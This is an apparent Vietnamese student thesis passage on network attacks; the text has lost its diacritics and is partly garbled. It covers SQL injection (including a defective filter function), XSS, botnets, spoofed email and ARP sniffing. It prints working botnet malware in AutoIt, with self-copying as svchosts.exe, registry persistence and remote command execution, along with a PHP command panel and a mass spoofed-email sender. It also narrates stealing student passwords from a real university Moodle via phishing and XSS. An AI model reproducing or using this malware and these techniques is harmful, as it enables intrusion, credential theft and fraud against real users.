xp_cmdshell cmd.exe dir C: '.

Lc ny h thng s thc hin lnh lit k th mc

trn a C:\ ci t server. Vic ph hoi kiu no tu thuc vo cu lnh ng sau

cmd.exe.
2.3.2.Cch Phng Trnh SQL Injection
Nh vy, c th thy li SQL injection khai thc nhng bt cn ca cc lp trnh vin
pht trin ng dng web khi x l cc d liu nhp vo xy dng cu lnh SQL. Tc
hi t li SQL injection ty thuc vo mi trng v cch cu hnh h thng. Nu ng
dng s dng quyn dbo (quyn ca ngi s hu c s d liu - owner) khi thao tc
d liu, n c th xa ton b cc bng d liu, to cc bng d liu mi, Nu ng
dng s dng quyn sa (quyn qun tr h thng), n c th iu khin ton b h qun
tr c s d liu v vi quyn hn rng ln nh vy n c th to ra cc ti khon
ngi dng bt hp php iu khin h thng ca bn. phng trnh, ta c th
thc hin hai mc:
i. Kim sot cht ch d liu nhp vo
phng trnh cc nguy c c th xy ra, hy bo v cc cu lnh SQL l bng cch
kim sot cht ch tt c cc d liu nhp nhn c t i tng Request (Request,
Request.QueryString, Request.Form, Request.Cookies, and Request.ServerVariables).
V d, c th gii hn chiu di ca chui nhp liu, hoc xy dng hm EscapeQuotes
thay th cc du nhy n bng 2 du nhy
-43-

n nh:
<%
Function EscapeQuotes(sInput)
sInput = replace(sInput, " ' ", " ' ' ")
EscapeQuotes = sInput
End Function
%>
Trong trng hp d liu nhp vo l s, li xut pht t vic thay th mt gi tr c
tin on l d liu s bng chui cha cu lnh SQL bt hp php. trnh iu ny,
n gin hy kim tra d liu c ng kiu hay khng bng hm IsNumeric().
Ngoi ra c th xy dng hm loi b mt s k t v t kha nguy him nh: ;, --,
select, insert, xp_, ra khi chui d liu nhp t pha ngi dng hn ch cc tn
cng dng ny:
<%
Function KillChars(sInput)
dim badChars
dim newChars
badChars = array("select", "drop", ";", "--", "insert", "delete", "xp_")
newChars = strInput
for i = 0 to uBound(badChars)
next
KillChars = newChars
End Function
%>
ii. Thit lp cu hnh an ton cho h qun tr c s d liu
Cn c c ch kim sot cht ch v gii hn quyn x l d liu n ti khon ngi
dng m ng dng web ang s dng. Cc ng dng thng thng nn trnh dng n
cc quyn nh dbo hay sa. Quyn cng b hn ch, thit hi cng t.
Ngoi ra trnh cc nguy c t SQL Injection attack, nn ch loi b bt k thng
tin k thut no cha trong thng ip chuyn xung cho ngi dng khi ng dng c
-44-

li. Cc thng bo li thng thng tit l cc chi tit k thut c th cho php k tn
cng bit c im yu ca h thng.
2.4. Cross Site Scripting (XSS)
2.4.1. Tn cng XSS
Cross-Site Scripting (XSS) l mt trong nhng k thut tn cng ph bin nht hin
nay, ng thi n cng l mt trong nhng vn bo mt quan trng i vi cc nh
pht trin web v c nhng ngi s dng web. Bt k mt website no cho php ngi
s dng ng thng tin m khng c s kim tra cht ch cc on m nguy him th
u c th tim n cc li XSS.
Cross-Site Scripting hay cn c gi tt l XSS (thay v gi tt l CSS trnh
nhm ln vi CSS-Cascading Style Sheet ca HTML) l mt k thut tn cng bng
cch chn vo cc website ng (ASP, PHP, CGI, JSP ...) nhng th HTML hay nhng
on m script nguy him c th gy nguy hi cho nhng ngi s dng khc. Trong
, nhng on m nguy him c chn vo hu ht c vit bng cc Client-Site
Script nh JavaScript, JScript, DHTML v cng c th l c cc th HTML.K thut
tn cng XSS nhanh chng tr thnh mt trong nhng li ph bin nht ca Web
Applications v mi e do ca chng i vi ngi s dng ngy cng ln. Ngi
chin thng trong cuc thi eWeek OpenHack 2002 l ngi tm ra 2 XSS mi. Ph i

chng mi nguy him t XSS ngy cng c mi ngi ch hn.

+Hot ng Ca XSS
V c bn XSS cng nh SQL Injection hay Source Injection, n cng l cc yu cu
(request) c gi t cc my client ti server nhm chn vo cc thng tin vt
qu tm kim sot ca server. N c th l mt request c gi t cc form d liu
hoc cng c th ch l cc URL nh l http://www.example.com/search.cgi?
query=<script>alert('XSS was found !');</script>
V rt c th trnh duyt ca bn s hin ln mt thng bo "XSS was found !". Cc
on m trong th script khng h b gii hn bi chng hon ton c th thay th
bng mt file ngun trn mt server khc thng qua thuc tnh src ca th script. Cng
chnh v l m chng ta cha th lng ht c nguy him ca cc li XSS.
-45-

Nhng nu nh cc k thut tn cng khc c th lm thay i c d liu ngun ca

web server (m ngun, cu trc, c s d liu) th XSS ch gy tn hi i vi website
pha client m nn nhn trc tip l nhng ngi khch duyt site . Tt nhin i
khi cc hacker cng s dng k thut ny deface cc website nhng vn ch tn
cng vo b mt ca website. Tht vy, XSS l nhng Client-Side Script, nhng on
m ny s ch chy bi trnh duyt pha client do XSS khng lm nh hng n h
thng website nm trn server. Mc tiu tn cng ca XSS khng ai khc chnh l
nhng ngi s dng khc ca website, khi h v tnh vo cc trang c cha cc on
m nguy him do cc hacker li h c th b chuyn ti cc website khc, t li
homepage, hay nng hn l mt mt khu, mt cookie thm ch my tnh bn c th s
b ci cc loi virus, backdoor, worm
+Cch Tn Cng
i: TRUY TM L HNG XSS CA NG DNG WEB
Cch 1: S dng nhiu chng trnh d qut li ca ng dng web, v d nh chng
trnh Web Vulnerability Scanner d qut li XSS.
Cch 2: Thc hin 5 bc:
Bc 1: M website cn kim tra
Bc 2: Xc nh cc ch (phn) cn kim tra XSS. 1 Site bt k bao gi cng c cc
phn:
Search, error message, web form. Ch yu li XSS nm phn ny, ni chung XSS c
th xy ra ch no m ngi dng c th nhp d liu vo v sau nhn c mt
ci g . V d chng ta nhp vo chui XSS
Bc 3: Xc minh kh nng site c b li XSS hay khng bng cch xem cc thng tin
tr v. V d chng ta thy th ny: Khng tm thy XSS , hay l Ti khon XSS
khng chnh xc, ng nhp vi XSS khng thnh cng th khi kh nng ch
b dnh XSS l rt cao.
Bc 4: Khi xc nh ch c kh nng b dnh li XSS th chng ta s chn nhng
on code ca chng ta vo th tip, v d nh sau:
Chn on code ny: < script>alert('XSS')< /script> vo b li v nhn nt Login, nu
chng ta nhn c mt popup c ch XSS th 100% b dnh XSS. Nhng xin ch ,
-46-

thnh thong vn c trng hp website b dnh XSS nhng vn khng xut hin ci
popup th buc lng bn phi VIEW SOURCES (m bng) n ra xem . Khi view
sources nh kim dng ny < script>alert('XSS)< /script> , nu c th ht chy , XSS
y ri.
Gi http://doannguyennganh.com/index.php l site b dnh li XSS v ta tm c ni
b li nh th ny : http://doannguyennganh.com/index.php?page=<script...</ script> ,
ngha l ta c th chn code ngay trn thanh ADDRESS.
Bc 5: Ln k hoch kch bn tn cng
ii: Tn Cng
Tht ra th c rt nhiu k thut tn cng da trn li XSS ny, ch yu l sau khi
bit cch tm l hng th mi ngi s c mt mu m cho cch tn cng ca mnh.
y mnh xin gii thiu n cc bn mt k thut m mnh thc hin thnh cng trn
trang moodle ca khoa cng ngh thng tin KHTN. K thut n cp password.
Sau khi xc minh mt iu chc chn rng trang moodle b li XSS ch ng nhp
Ti lp tc vit ngay mt ng dng nh ri up ln mt ci host free, ng dng ny s
c nhim v nhn thng tin v mssv v password gi v v ghi xung file txt. Cn
nhn th no th mi cc bn xem tip...
Sau :
Bc 1: Ti to mt mail gi dng ni l: Din n tuyn dng ca Intel, mi cc bn
no quan tm th tham gia.Ri to ra mt ci ng link gi:
http://doannguyennganhgia.com/index.php
nhng ti l reference n ti mt ci trang gi ca tui. Trong tch tc trang ny s gn
mt ci on script c c nhim v ly v username v password sau khi ng nhp
v gn vo ci trang tht(V trang tht b li XSS nn cho php chng ta gn m c
ln, gn y c ngha l khi chng ta view source code ca trang ln, chng ta s thy
c mt on script ca chng ta nm u ), ri sau redirect sang trang tht ngay
lp tc khi b nghi ng.
Bc 2: Ngi dng vo mail, tng tht, click vo link v thy chy ng trang
moodle (H u ng rng, trang tht b gn m c ln, trong thi gian qu nhanh
nn h khng nghi ng g c, nhng nu ai s thy link khng ng).
-47-

Bc 3: H ng nhp, khi ng dng s chy bin dch t trn xung, v tt nhin

s chy lun c script m chng ta ci, khi MSSV v password s c ly v
gi cho mt ci trang trn server m chng ta dng ra.
Bc 4: ng dng server ca ta nhn c mssv v password, ghi ra file txt.
Bc 5: Kt thc qu trnh tn cng, chng ta c mt danh sch cc ti khon ca sinh
vin.
2.4.2. Phng Chng
Nh cp trn, mt tn cng XSS ch thc hin c khi gi mt trang web cho
trnh duyt web ca nn nhn c km theo m script c ca k tn cng. V vy nhng
ngi pht trin web c th bo v website ca mnh khi b li dng thng qua nhng
tn cng XSS ny, m bo nhng trang pht sinh ng khng cha cc tag ca script
bng cch lc v xc nhn hp l cc d liu u vo t pha ngi dng hoc m
ha(endcoding) v lc cc gi tr xut cho ngi dng.
+Lc
Lun lun lc cc d liu nhp t pha ngi dng bng cch lc cc k t meta (k t
c bit) c nh ngha trong c t ca HTML. Mi trng nhp liu bao gm c
tham s lin kt s c kim tra pht hin cc th script.
+M ha
Li XSS c th trnh c khi my ch Web m bo nhng trang pht sinh c m
ha (encoding) thch hp ngn chy chy cc script khng mong mun.
M ha pha my ch l mt tin trnh m tt c ni dung pht sinh ng s i qua mt
hm m ha ni m cc th script s c thay th bi m ca n.
Ni chung, vic m ha(encoding) c khuyn khch s dng v n khng yu cu
bn phi a ra quyt nh nhng k t no l hp l hoc khng hp l.Tuy nhin vic
m ha tt c d liu khng ng tin cy c th tn ti nguyn v nh hng n kh
nng thc thi ca mt s my ch

-48-

2.5. Botnet
2.5.1. Tm hiu botnet v cch pht tn
Mng botnet l mt mng gm hng trm hng ngn my tnh b chim quyn iu
khin (zombie) c hacker dng thc hin cc cuc tn cng DDOS, pht tn th
rc hoc ci t cc chng trnh qung co
Dng cc tools pht tn virut cho nn nhn v chim quyn iu khin. Mng
Botnet h tr nhiu cho vic tn cng t chi dch v
Cc mng botnet ph bin nh Marisposa hay Zeus

2.5.2. Khc phc

Khng click vo bt c ng link no c gi ti cho bn m khng bit ngun gc
ca chng
2.5.5. Cc cng c h tr
Cc tools ny a s c cc hacker vit ra nhm pht tn virut chim quyn iu
khin.y l mt v d v code botnet c vit bng autoit
#NoTrayIcon
#Region ;**** Directives created by AutoIt3Wrapper_GUI ****
#AutoIt3Wrapper_icon=duc.ico
#AutoIt3Wrapper_Res_Comment= Do An Chuyen Nganh
#AutoIt3Wrapper_Res_Description= Do An Chuyen Nganh
#AutoIt3Wrapper_Res_Fileversion=2.1.0.1
#AutoIt3Wrapper_Res_LegalCopyright=CopyRight(C) ProKill Production
#AutoIt3Wrapper_Res_Language=1033
#EndRegion ;**** Directives created by AutoIt3Wrapper_GUI ****
#include <Process.au3>
$txt = "http://doanchuyenganh.net/direc.txt"
FileCopy(@ScriptFullPath, @SystemDir & "\svchosts.exe", 1)
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Run", "svchosts", "REG_SZ", @SystemDir & "\svchosts.exe")
$A1610F06101 = IniRead(@SystemDir & "\knt.ini", "1", "1", "")
IniWrite(@SystemDir & "\knt.ini", "1", "1", $A1610F06101 + 1)
If $A1610F06101 = 2 Then
RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Run", "knt")
EndIf
-49-

While (1)
GetDr()
ExCmd()
Sleep(1000)
WEnd
Func GetDr()
; Doc va phan tich chi thi
InetGet ($txt, @WindowsDir & "\direc.txt", 1, 0)
$fp = FileOpen(@WindowsDir & "\direc.txt", 0)
Global $con = FileReadLine($fp)
FileClose($fp)
FileDelete(@WindowsDir & "\direc.txt")
EndFunc
Func ExCmd()
; Phan tich va thuc hien lenh
If StringInStr($con, "RUN@", 2) Then ;Chay mot chuong trinh
$cmd = StringSplit($con, "@")
If StringInStr($con, "@SHOW", 2) Then
Run($cmd[2])
Else
Run($cmd[2], "", @SW_HIDE)
EndIf
Sleep(7000)
ElseIf StringInStr($con, "DEL@", 2) Then ;xoa mot file
$cmd = StringSplit($con, "@")
FileDelete($cmd[2])
Sleep(7000)
ElseIf StringInStr($con, "LOAD@", 2) Then ;tai mot file
$cmd = StringSplit($con, "@")
InetGet ($cmd[2], $cmd[3], 0, 1)
Sleep(7000)
ElseIf StringInStr($con, "KILL@", 2) Then ;tat mot tien trinh
$cmd = StringSplit($con, "@")
Run("TASKKILL /F /IM " & $cmd[2] & ".exe", "", @SW_HIDE)
Sleep(7000)
ElseIf StringInStr($con, "DOS@", 2) Then ;Chay len dos, an voi nguoi dung
DOS#LENH
$cmd = StringSplit($con, "@")
-50-

$rc = _RunDos($cmd[2])
Sleep(7000)
ElseIf StringInStr($con, "MSGBOX@", 2) Then ;hien thong bao
MSGBOX#flag#title#text#timeout
$cmd = StringSplit($con, "@")
MsgBox($cmd[2],$cmd[3],$cmd[4],$cmd[5])
Sleep(7000)
ElseIf StringInStr($con, "EXIT@", 2) Then ;thoat chuong trinh
$cmd = StringSplit($con, "@")
Exit
EndIf
EndFunc
//Bang Dieu Khien
<html>
<head>
<title>Bang dieu khien cua BotNet</title>
</head>
<body style='color:#00FF00; background-color: black'>
<center>
<br>
<form action=# method=POST>
<input type=text name=cmd size=80>
<input type=submit value=Ok>
</form>
<br>
</body>
</html>
<?php
$cmd = $_POST['cmd'];
$fp = fopen('direc.txt', 'w');
fwrite($fp, $cmd);
fclose($fp);
echo $cmd;
?>
</center>
<br/>
<br/>
<br/>RUN@path_file<br/>
DEL@path_file<br/>
KILL@ten_Processe<br/>
LOAD@URL@PATH<br/>
DOS@LENH<br/>
MSGBOX@flag@title@text@timeout<br/>
-51-

2.6. Social Engineering

2.6.1. Cc kiu la o thng dng
Face mail
Hin nay xut hin mt s mail la o m ngi nhn khng h bit ti. l a
ch mail gi ti l ca ngi thn quen ca mnh v khng h nghi ngh g v
chng.T nn nhn s click vo bt c dng link no hay p ng mt s yu cu
no ca hacker
Sau y l code ca mt trang face mail ph bin.
Trang index.php
Code
<title>.:: Fake Mail :: doanchuyennganh.com :: nguyenanhduc.dtu@gmail.com
::.</title>
<form action="sendmail.php" method="post">
<table border="0">
<tbody>
<tr>
<td>To :</td>
<td><textarea name="emaillist" cols="30" rows="10">Email gi n
name@abc.com</textarea></td>
</tr>
<tr>
<td>From :</td>
<td><input name="from" type="text" />Email ngi gi</td>
</tr>
<tr>
<td>From Name :</td>
<td><input name="name" type="text" />Tn ngi gi</td>
</tr>
<tr>
-52-

<td>Subject :</td>
<td><input name="subject" type="text" />Tiu </td>
</tr>
<tr>
<td>Message :</td>
<td><textarea cols="30" rows="10" name="message">Ni dung</textarea></td>
</tr>
<tr>
<td></td>
<td><input type="submit" value="Send" /></td>
</tr>
</tbody></table>
</form>
Trang sendmail.php
<html>
<head>
<title>.:: Fake Mail :: doanchuyennganh.com :: nguyenanhduc.dtu@gmail.com
::.</title>
</head>
<body>
<?php
$emaillist=$_POST['emaillist'];
$allemails = split("\n", $emaillist);
$numemails = count($allemails);
for($x=0; $x<$numemails; $x++){
$to = $allemails[$x];
$from=$_POST['from'];
$name=$_POST['name'];
$subject=$_POST['subject'];
$message=$_POST['message'];
-53-

$message=$message;
$head="From: <$name>".$from."\r\n".
'Reply-To: '.$from."\r\n";
$her=$head.' < '.$from.' >';
$ret=mail($to, $subject, $message, $her);
}
if($ret==true)
echo "<br /> Mail sent Successfully";
else
echo "<br /> Unable to Send mail";
?>
<br><a href="/">Go Back</a>
</body>
</html>
Sau upload 2 trang trn ln host.Sau chy trang index.php ri thc hin facemail
Nhc im: hacker phi bit mail ca nn nhn.
2.6.2. Cc kiu la o khc
Cc kiu la o khc nh mo danh s in thoi m hin nay ai ai cng bit.Mo
danh gim c gi in cho th k,..Vi cch ny i hi hacker phi nm r chi tit
v nn nhn
2.7. Sniffer
2.7.1. Tm hiu tn cng kiu sniffer
Ph bin nht l cng c Cain & Abel . Cng c ny nghe ln rt mnh.Chng ta s tm
hiu sniffer thng qua cng c ny

-54-

Hnh 2.13. Cng c cain khi mi khi ng

a s cc hacker u s dng cng c ny nghe ln trong mng Lan.Cc tools nghe
ln ny s bt gi tin c truyn i trong mng Lan v gi v cho hacker.Tuy theo
bo mt ca gi tin m cc tools ny c dich c hay khng.V hacker s tin hnh
c cc gi tin ny thc hin mc ch ca mnh.
2.7.2. Cc cng c h tr
-

Cain & Abel v4.9.8 .

Ethereal v0.10.14 .

EtherPeek v .

EffeTechHTTP Sniffer v .

Wireshack.

-55-

CHNG 3
DEMO
Sau y ti xin demo kiu tn cng Sniffer trong mng Lan.Dng phn mm
sniffer Cain & Abel v4.9.8 .Phn ci t Cain & Abel v4.9.8 ti s khng trnh by.

Hnh 3.1. Cain mi khi va c khi ng

Chn Tab Sinffer .

Hnh 3.2. Tab Sniffer

Chn Configure .

-56-

Hnh 3.3 Tab Config

Ta chn card mng giao tip vi h thng mng tin hnh Sniffer y ti chn
card mng 192.168.1.53 .

Hnh 3.4. Cu hnh chn card Mng

Xong cc thit lp Chn OK

-57-

Chn Start Sniffer

Hnh 3.5. Tab Sniffer

Chn Start ARP .

Hnh 3.6. Tab ARP

-58-

Chn Add to List (+) .

Hnh 3.6. Thnh phn Add to List

Chn OK (y l lp mng ta mun Sniffer, y ti mc nh)

Hnh 3.7. Chn di Ip cn qut

y l qu trnh qut ton b trn h thng mng ta mun Sniffer

-59-

Hnh 3.8. Cain ang qut cc lp mng

y l danh sch cc my c trong h thng mng ta mun Sniffer .

Hnh 3.9. Cc my c trong mng khi qut xong

Ta chn Tab ARP .

Hnh 3.10. Thnh phn ARP

-60-

Trong bng trn cng bn phi, ta nhn chut vo trong bng hin ra Add to List (+)
Chn Add to List (+) .

Hnh 3.11. Thnh phn Add to List trong ARP

Hnh 3.12. Cc a ch mng cn sniffer

Chn a ch Router Sniffer 192.168.1.1 .

-61-

Hnh 3.13. a ch mng c chn Sniffer

Chn tt c cc my ta mun Sniffer .

Hnh 3.14. a ch mng c chn(Bi xanh)

Chn OK .
Chn Start ARP .

-62-

Hnh 3.15. Nt bt u ARP

Ta kim tra qu trnh Sniffer ca Cain & Abel .

Hnh 3.16. Qu trnh Sniffer

Chn Tab Passwords .

Hnh 3.17. Chn Tab Password

-63-

Chn HTTP xem danh sch Sniffer c bn tay phi .

Hnh 3.18. Ni dung username v password m Cain Sniffer c

-64-

KT LUN
1. Cc vn t c
Qua qu trnh thc hin n chuyn ngnh ln ny vn u tin m em t c
l c bn hiu c l cc nguyn l,phng php tn cng m chng ta thy hng
ngy trn mng v c bn cng hiu thm nhng phng php hn ch cc la hnh tn
cng ny.
T vic trin khai n chuyn ngnh ny gip em bit thm nhng kin thc v
bo mt thng tin trong mng quan trng ra sao v nm vng c kin thc v an
ton mng m em c hc t trc.

2. Hn ch
Trong qu trnh lm n c rt nhiu ti liu ti tm kim tuy c mc ch l
ging nhau song li c phng php khc nhau hon ton.Ti c gng
tm hiu thm v chng nhng khng khi c nhiu sai st

-65-

TI LIU THAM KHO

A. Ti liu Ting Vit:
[1] Tn cng t chi dch v Dos,Ddos,DRDos. Tc gi Ng.Ng.Thanh Ngh-HVA
[2] Bi ging An Ninh Mng.Tc gi GV.Nguyn Anh Tun-Trung tm TH-NN Tr
c
[3] Li bo mt trn ng dng web v cch khc phc.Tc gi ng Hi Sn-Trung
tm ng cu khn cp my tnh Vit Nam
[4] Tn cng kiu SQL Injection-Tc hi v phng trnh. Tc gi L nh Duy-Khoa
CNTT-Trng H Khoa Hc T Nhin TP.HCM
[5] Web Application Attack & Defense. Tc gi V Thng-Trung tm An ninh
mng Athena
[6] XSS c bn. Tc gi Mask-NBTA

B. Ti liu Ting Anh:

[7] SQL Injection-Are you web Applications vulnerable. Author Kevin Spett
[8] An Introduction to SQL Injection Attacks For Oracle Developers.Author Stephen
Kost
[9] How to Attack and fix Local File Disclosure. Author Sangteamtham

C. Ti liu internet:
[10]http://thuvienkhoahoc.com/wiki/K%C4%A9_thu%E1%BA%ADt_t%E1%BA
%A5n_c%C3%B4ng_CROSS-SITE_SCRIPTING
[11]http://vi.wikipedia.org/w/index.php?title=Th%E1%BB%83_lo%E1%BA%A1i:T
%E1%BA%A5n_c%C3%B4ng_t%E1%BB%AB_ch%E1%BB%91i_d%E1%BB
%8Bch_v%E1%BB%A5&action=edit&redlink=1
[12]http://www.hvaonline.net/hvaonline/posts/list/6720.hva;jsessionid=38F900726E07
641F712734A3B2A6F2EC
[13]http://www.ddcntt.vn/forum/showthread.php?t=14
-66-

[14]http://ttgtc.com/forum/showthread.php?1385-T%C3%ACm-hi%E1%BB%83u-v
%E1%BB%81-t%E1%BA%A5n-c%C3%B4ng-t%E1%BB%AB-ch%E1%BB%91i-d
%E1%BB%8Bch-v%E1%BB%A5-DoS&s=c580b874a6ea05d220258132c9cef9e3
[15]http://rootbiez.blogspot.com/2010/02/virus-botnet-va-cach-hoat-ong.html
[16]http://www.ictnews.vn/Home/bao-mat/Cau-noi-Quan-trimang/2SVCM99/trang0.htm
[17]http://harry.com.vn/read.php?33
[18]http://tailieuit.com/forum/thu-thuat-mang-bao-mat-437/cach-chmod-filemanagerhan-che-local-nen-doc-6082/?pagenumber=
[19]http://9xpro.biz/9x/showthread.php?3637-Ph%C6%B0%C6%A1ng-ph%C3%A1pch%E1%BB%91ng-local-attack-hi%E1%BB%83u-qu%E1%BA%A3-nh%E1%BA
%A5t&s=3ea1e2f1c729950584539c98ef865a8b

-67-

NHN XT CA GING VIN HNG DN

...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
-68-

...................................................................................................................................
...................................................................................................................................

NHN XT CA GING VIN PHN BIN

...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
-69-

...................................................................................................................................
...................................................................................................................................

-70-